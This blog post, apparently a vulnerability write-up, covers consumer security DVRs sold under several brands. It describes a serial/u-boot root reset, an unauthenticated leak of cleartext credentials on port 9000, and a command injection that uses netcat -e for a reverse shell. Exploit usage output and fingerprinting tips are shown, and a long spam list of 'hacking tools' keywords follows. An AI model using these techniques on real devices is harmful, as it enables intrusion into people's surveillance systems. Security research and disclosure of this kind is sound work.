I recently had a chance to get my hands on a 4 channel DVR system system sold under a handful of company banners (4/8/16 channels) - Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc. A few device model numbers are - DVR04B, DVR08B, DVR-16CIF, DVR16B
After firing up the device and putting it on the network I noticed that it was running a telnet server, unfortunately the device does not appear to come configured with an easy/weak login :(. Time to open it up and see whats going on :)
After hooking up my usb to serial breakout board to the device serial port and guessing at the following serial settings: 115200 8-N-1 , I was stuck looking at a login prompt without a working login or password.
Lucky for me the device startup can be reconfigured using the u-boot environment. The environment variable "bootargs" can be adjusted to boot the linux system into single user mode by appending "single" to the end of the existing settings:
setenv bootargs mem=68M console=ttyAMA0,115200 root=1f01 rootfstype=jffs2 mtdparts=physmap-flash.0:4M(boot),12M(rootfs),14M(app),2M(para) busclk=220000000 single
This change to the bootargs variable is only temporary at this point, if we were to power cycle the device the change would be lost. It is possible to write these changes to the device, but in this case we only want to boot into single user mode once. To boot the device you need to tell the boot loader where the kernel exists in memory, this value can be found in the default environment variable "bootdcmd".
Once the device is booted up in single user mode, the root password can be reset and the device can be rebooted. Telnet now works, but what fun is that when these devices don't normally expose telnet to the internet :). Now for the real fun...looking at the device the default configuration is setup to auto-magically use the power of the dark lord satan (uPnP) to map a few ports on your router (if it supports uPnP). One of the ports that it will expose is for the web (activeX) application and the other is the actual comms channel the device uses (port 9000). The first item I looked at was the web application that is used to view the video streams remotely and configure the device. The first thing that I found with this lovely device is that the comms channel (9000) did not appear to do any authentication on requests made to it...Strike 1. I imagine the activeX application that is used to connect to the device could be patched to just skip the login screen, but that seems like a lot of work, especially when there are much easier ways in. The next thing I saw was a bit shocking...when you access the application user accounts page the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text. Strike 2. I created a small PoC in python that will pull the password from a vulnerable device:
python getPass.py 192.168.10.69
[*]Host: 192.168.10.69
[+]Username: admin
[+]Password: 123456
Script can be found here.
After owning the device at the "application" level, I figured it was time to go deeper.
Port 9000 is run by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. First thing I noticed was the device was using the "system" call to carry out some actions, after chasing down these calls and not seeing much, the following popped up:
Port 9000 is run by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. First thing I noticed was the device was using the "system" call to carry out some actions, after chasing down these calls and not seeing much, the following popped up:
"sprintf" with user input into a "system", that'll do it. Couple problems to overcome with this. First in order to use this vector for command injection you must configure the device to use "ppp" - this will cause the device to go offline and we will not be able to interact with it further :(. We can get around this issue by injecting a call to the dhcp client appliction ("udhcpc") - this will cause the device to use dhcp to get its network information bypassing the previous "ppp" config. The other issue is once we have reconfigured the device to run our command, it needs to be restarted before it will execute (its part of the init scripts). The application does not actually provide a way to reboot the device using the web interface, there is a section that says 'reboot', but when it is triggered nothing happens and some debugging information displayed in the serial console saying the functionality is not implemented. Lucky for us there are plenty of overflow bugs in this device that will lead to a crash :). The device has a watchdog that polls the system to check if the "raysharpdvr" application is running and if it does not see it, it initiates a system reboot - very helpful. With those two issues out of the way the only thing left is HOW to talk to our remote root shell that is waiting for us....luckily the device ships with netcat built into busybox, -e flag and all :)
Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
[*]Sending Stage 1
[*]Sending Stage 2
[*]Rebooting the server with crash....
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:9999
Strike 3, get this weak shit off my network. The script can be found here. The script relies on the web application running on port 80, this is not always the case so you may need to adjust the script to fix if your device listens on another port. It is also worth noting that it may take a few minutes for the device to reboot and connect back to you.
Unfortunately the web server that runs on this device does not behave correctly (no response headers) so I do not believe finding these online is as easy as searching shodan, however it is possible to fingerprint vulnerable devices by looking for hosts with port 9000 open.
tl;dr; A whole slew of security dvr devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.
tl;dr; A whole slew of security dvr devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.
More information
- New Hacker Tools
- Hack App
- Pentest Tools Url Fuzzer
- Hacking Tools Windows
- Pentest Tools Framework
- Hacking Apps
- Black Hat Hacker Tools
- Hacking Tools For Windows Free Download
- Hack Rom Tools
- Hack Tools Github
- Pentest Tools Github
- Hacking Tools For Mac
- Pentest Tools Bluekeep
- Hak5 Tools
- Hack Tools Github
- Hacker Tools Software
- Hack Tool Apk
- Underground Hacker Sites
- Hack Tools For Ubuntu
- Hacker Tools Apk
- Pentest Tools Linux
- Pentest Tools Free
- Hacker Tools
- Hack Tools Mac
- Hack Tools For Games
- Hack Tools For Pc
- Hacking Tools For Pc
- Pentest Tools Free
- Hacker Tools List
- Tools 4 Hack
- Hacking Tools Kit
- Hacker Security Tools
- Pentest Tools Url Fuzzer
- Beginner Hacker Tools
- Hacking Tools For Windows 7
- Tools Used For Hacking
- How To Install Pentest Tools In Ubuntu
- Hack Tools
- New Hacker Tools
- Hacking Tools 2020
- Hack Website Online Tool
- Hacker Tools For Pc
- Kik Hack Tools
- Hacking Tools Mac
- Hacker Tools Free
- Hack Tools 2019
- Hacker
- Hacking Tools Software
- Hacker Tools Free Download
- Hacking Tools For Windows Free Download
- Hack Tools Download
- Hak5 Tools
- Hacking Tools For Games
- Pentest Tools Tcp Port Scanner
- Hacking Tools 2020
- Termux Hacking Tools 2019
- Tools Used For Hacking
- How To Make Hacking Tools
- Pentest Tools For Windows
- Hacker
- Pentest Tools
- What Is Hacking Tools
- Pentest Tools Framework
- Hacker Tools Windows
- Pentest Tools Port Scanner
- Hacking Tools 2020
- Hacking Tools For Kali Linux
- Hacking Tools Software
- Hacker Tools Online
- Pentest Tools Find Subdomains
- Hack Tools Github
- How To Make Hacking Tools
- Hack Tools Online
- Pentest Tools For Ubuntu
- Hacker Tools For Windows
- Best Hacking Tools 2020
- Nsa Hacker Tools
- Hack Tool Apk
- Pentest Tools Download
- Pentest Tools For Ubuntu
- Hacker Tools Free
- Pentest Tools Open Source
- Bluetooth Hacking Tools Kali
- Hacker Tools For Pc
- Hacker Tools For Mac
- Pentest Tools Find Subdomains
- Hacking Tools For Beginners
- Best Hacking Tools 2019
- Tools 4 Hack
- Hack And Tools
- Hacker Tools 2019
- Hack Tools
- Hacker Tools Windows
- Hacking Tools Mac
- Hacking Tools For Mac
- Top Pentest Tools
- Hacker Tools 2019
- Hack Tools
- Hack Tools For Games
- Top Pentest Tools
- Hacking Tools For Kali Linux
- Termux Hacking Tools 2019
- Pentest Tools Open Source
- Pentest Tools Nmap
- Hack Tools For Ubuntu
- Ethical Hacker Tools
- Free Pentest Tools For Windows
- Pentest Tools Apk
- Hacker Hardware Tools
- Hacker Tools Linux
- Pentest Tools Website Vulnerability
- Best Hacking Tools 2019
- Pentest Automation Tools
- Hack Apps
- Pentest Tools Kali Linux
- Hacker Tools Windows
- Pentest Tools Website
- Pentest Tools List
- Hacker Tools Github
- Pentest Tools Windows
- Free Pentest Tools For Windows
- Hacking App
- Hack Tool Apk No Root
- Pentest Recon Tools
- Hack Tools For Mac
- Tools 4 Hack
- Hacking App
- Hack Tools 2019
- Bluetooth Hacking Tools Kali
- Pentest Automation Tools
- Hack Tools For Windows
- Best Hacking Tools 2019
- Pentest Tools Alternative
- Hacker
- Install Pentest Tools Ubuntu
- Hacker Tools For Ios
- Android Hack Tools Github
- Kik Hack Tools
- Top Pentest Tools
- Hacker Hardware Tools
- New Hacker Tools
- Hacker Tools For Ios
- Pentest Recon Tools
- Hacking Tools Online
- Pentest Tools Framework
- Hack Tool Apk No Root
- Pentest Box Tools Download
- Pentest Tools Open Source
- Hacking Apps
- Blackhat Hacker Tools
- Black Hat Hacker Tools
- Pentest Tools Nmap
- Pentest Tools Tcp Port Scanner
- Hacker Tools Github
- Hack Tool Apk
- Pentest Tools For Ubuntu
- Kik Hack Tools
- Pentest Tools Url Fuzzer
- New Hacker Tools
- Hacker Tools Free
- Beginner Hacker Tools
Posts
No comments:
Post a Comment